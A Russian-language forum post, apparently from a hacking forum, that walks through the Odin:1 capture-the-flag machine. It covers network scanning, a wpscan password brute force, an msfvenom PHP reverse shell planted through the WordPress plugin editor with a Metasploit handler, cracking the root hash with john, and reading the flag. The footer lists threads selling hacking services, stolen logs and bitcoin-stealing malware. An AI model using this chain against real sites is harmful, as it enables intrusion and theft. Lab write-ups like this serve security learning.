Солевой генний или как пройти CTF Odin: 1

AngelXXXanax

Original poster
Member
Сообщения
5
Реакции
8
Посетить сайт
И так... Посидел, поймал солевой трип и стал солевым гением. Так что сегодня вы будете читать статью о прохождении CTF Odin:1.



Незабываем добавить его в /etc/hosts



Так как он ставиться на VM, VB нам прийдется проскинть нашу сеть, чтобы найти IP. Для этого мы будем использовать утилиту под название arp-scan. Для этого мы пишем:



sudo arp-scan -l

e491359e1c4a738950ed6.png

IP машину у меня 192.168.1.6

Давайте теперь просканим открытые порты и посмотрим что там у нас такое интересное. Для этого мы будем использовать утилиту nmap > Ключ: sudo nmap -sS -Pn -n -p- -vvv -T4 192.168.1.6



c0687665d5d2ef2d5f5f3.png



Как мы можем видеть у нас есть открытый порт 80. Это значит что мы можем перейти по этому IP и попасть на сайт. Если это сделать - то мы увидим это:

e7dcc258f5f2dace2176d.png

Верно! Это говно какое-то) Если немного полазить по сайту мы можем понять что он на движке wordpress. Так что давайте зайдем на точку входа в админ панель.

3ceaa18a30d3b0d2bf52a.png

Окей. На данный момент у нас все весьма хорошо! Так что давайте попробуем сбрутить админ пароль с помощью wpscan.



Для этого мы напишем:

wpscan --url

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--usernames admin --passwords путь на ваш словарь для брута

Теперь нам осталось недолго подождать когда подберет нужный нам пароль. И как мы видим он смог подобрать нужный нам пароль:

37d3c1c3023d47608eaf8.png



Пробуем зайти в админ-панель:

dee29bd0751a95a5f2997.png

Как мы видим у нас все получилось! Но нам нужно как-то попасть на сервер и получить флаг... Так что можно попробовать загрузить шелл на сайт! Для этого жмем plugins > plugin editor:

a6b49fd00042f4d702d86.png

Теперь давайте будем использовать msfvenom, чтобы создать наш шелл. Для этого пишем:

msfvenom -p php/meterpreter/reverse_tcp lhost=ваш IP lport=4444 R

ab764c8c307e6794b72e3.png

Теперь копируем и кидаем в плагины:

06626259090d8a360d325.png

Теперь запускаем наш msfconsole и пишем:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost ваш IP
set lport 4444
exploit



Теперь загружаем шелл и переходим по пути:


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.




P.S это в моем случае так как я выбрал другой плагин)



И как мы можем видеть мы получили meterpreter сессию. Теперь пишем shell, после чего пишем

python3 -c "import pty;pty.spawn('/bin/bash')"



88840cb4cad8805c45836.png

Как мы можем видеть у нас появился нормальный рабочий шелл. Давайте теперь немного полазим по файлам. Как мы видим я перешел на этот путь и нашел файл wp-config.php

12e529a20235515433aa0.png

Давайте теперь напишем: cat wp-config.php

После чего мы сразу увидим такой странный ключ:

f5b165e072da409ad4f43.png

Он и есть нашим паролем для входа в рут! Но нам ещё нужно взломать его. Для этого просто копируем его и сохраняем "В моем случае файл называться crack.txt". Теперь пишем:

john --wordlist=/usr/share/john/password.lst путь к файлу/crack.txt

5c4bea1c15db2d249fcc1.png

Как мы видим пароль нашелся! "jasmine". Теперь давайте попробуем зайти. Просто пишем: su root:

ea3f7a9c4f12cef556e8d.png



Теперь переходим в директорию root. Пишем cat bjorn:

339f40cf2d85858047d8e.png

Вот и все! Мы прошли машину.
 
  • Like
Реакции: Admin и 9779
Название темы
Автор Заголовок Раздел Ответы Дата
S Коронавирус - реальная угроза или манипуляции? Свободное общение и флейм 1
M Даю разовые или постоянные работы отрисовщикам(общий бюджет 500 долларов-смотрите видео доказательство). Предоставляю работу. Ищу специалиста. 3
slovokek Куплю Скуплю или отработаю логи БА ЮСА! Куплю/Обменяю 0
slovokek ищу трафферов фб или гугл Предоставляю работу. Ищу специалиста. 0
Config Куплю Реализую ваши аккаунты с почтой у себя в интернет магазине. Гарантия ~10 дней или верну аккаунт Куплю/Обменяю 0
Р Интересно Способ вывода с Binance и других бирж без верификации по СМС или 2FA Способы заработка 0
S Услуги Хакера Заказать Whatsapp,Viber,Telegram,Vk Связь с нами - [email protected] Всем Добрый день Интересует услуга взлома вашего Врага или же Корзина 0
9779 Интересно XSS, или как получить халявные cookie Ч1. Уязвимости и взлом 11
I Emacs VM или termux для программирования Свободное общение и флейм 0
9779 Интересно MST-или деанон через ссылку. Полезные статьи 7
abc11 Куплю Куплю dating отклик и базы email adult или dating направленности Куплю/Обменяю 1
S Дурак или Умный. Кому жить проще? Свободное общение и флейм 4
V Андрей Комбат «Начало пути или заработай в сети» 2.0 Способы заработка 2
Aleksandr Log Куплю Куплю свои запросы в ваших новых и/или отработанных USA логах Куплю/Обменяю 1
Ricardo Milos Продам Пластиковые карты Qiwi | ЮMoney, отправка СДЭК или фото пластика Финансы - биллинги, банки, кошельки, логи 0
H SMM за 100.000 или как получить пассивный доход (2021) Способы заработка 0
Р Интересно 1000 рублей на Delivery Club HONOR 10X Lite или HUAWEI P smart Способы заработка 0
B Купить или продать биткоин за рубли без регистрации Berukriptu.ru Обменники 0
st.ap Подскажите курсы или уроки по вирусописанию Вопросы и интересы 2
Ghozt ToxMod или история о том как за катку никто не трогал твою мать. Новости в сети 14
U 500 рублей за 15 минут нужны права или загран Корзина 0
Aleksandr Log Куплю Куплю свои запросы в ваших новых и/или отработанных USA логах (доступы к корп сетям). Куплю/Обменяю 0
M Куплю или отработаю БА DE Куплю/Обменяю 3
CMDfromBAT Интересно КАВЕР НА ГОРОД ПОД ПОДОШВОЙ или КОНКУРС НА ЛУЧШИЙ РЭП ПРО ИБ Свободное общение и флейм 6
CMDfromBAT Интересно НЕВИДИМЫЙ IP-LOGGER В СТАТЬЕ TELEGRAPH или ДЕАНОН LVL. 120 Уязвимости и взлом 16
T Поиск сценариев или вредоносного ПО для кражи биткойнов Продажа софта 2
Eteriass Интересно Боксерская груша хакеров или что такое metasploitable Полезные статьи 1
Anorali Интересно Как поймать хацкера за попу или написание своего honeypot'а Полезные статьи 3
3 Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на почту Корзина 0
X Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на поч Ищу работу. Предлагаю свои услуги. 1
Jony14 Интересно Взлом компьютера через беспроводную мышь или клавиатуру Уязвимости и взлом 2
K Нужен дроп или дроповод в Грузии Предоставляю работу. Ищу специалиста. 0
Terezamain Скопирую любой лохотрон или лендинг бесплатно или за символическую плату Другое 0
_ZerO_ Интересно Python и LongPoll VK, или как запустить скрипт ВК и настроит Другие ЯП 2
Sherlock_Holmes Не работает интернет без vpn или tor Вопросы и интересы 3
G Заплачу 70 долларов за два вбива(вбив по палке или по ццшке) Предоставляю работу. Ищу специалиста. 1
J Интересно Глушим сеть wi-fi в termux или kali WiFi/Wardriving/Bluejacking 4
D Интересно Ищу проект или софт Свободное общение и флейм 1
K Нужен дроповод или дроп в Грузии Свободное общение и флейм 0
K Нужны грузинские базы,выводим с казино,возможно уже акки этих казино,или под заточку Свободное общение и флейм 0
V Нужно узнать секреты или поймать на лжи? Корзина 0
2 Всё об уязвимостях GSM сетей или как вас прослушивают. Часть 1 Уязвимости и взлом 6
G Софт для брута /Brite Force или Malware Рубрики Бруты/Парсеры/Чекеры 0
ataman Телеграм бот для поиска имени по номеру или номера по ФИО Украина Пробив информации/Прозвоны 2
SSHMAN Самый страшный поисковик в интернете, “черный Google” или как найти уязвимые веб-камеры по всему миру используя Shodan Уязвимости и взлом 0
G Как взять микрозайм на Яндекс.Деньги или другой способ без ввода CVC? Вопросы и интересы 2
1 Просто ради интереса как много людей здесь слушает Black metal или DSBM? Видео/Музыка 3
lizun1 Duedex бонус или как получить 10$ Способы заработка 0
W Ищу работу или подработку Ищу работу. Предлагаю свои услуги. 0
Forumacc Стоит ли покупать tooligram, или как меня кинули на 18 000р Свободное общение и флейм 5

Название темы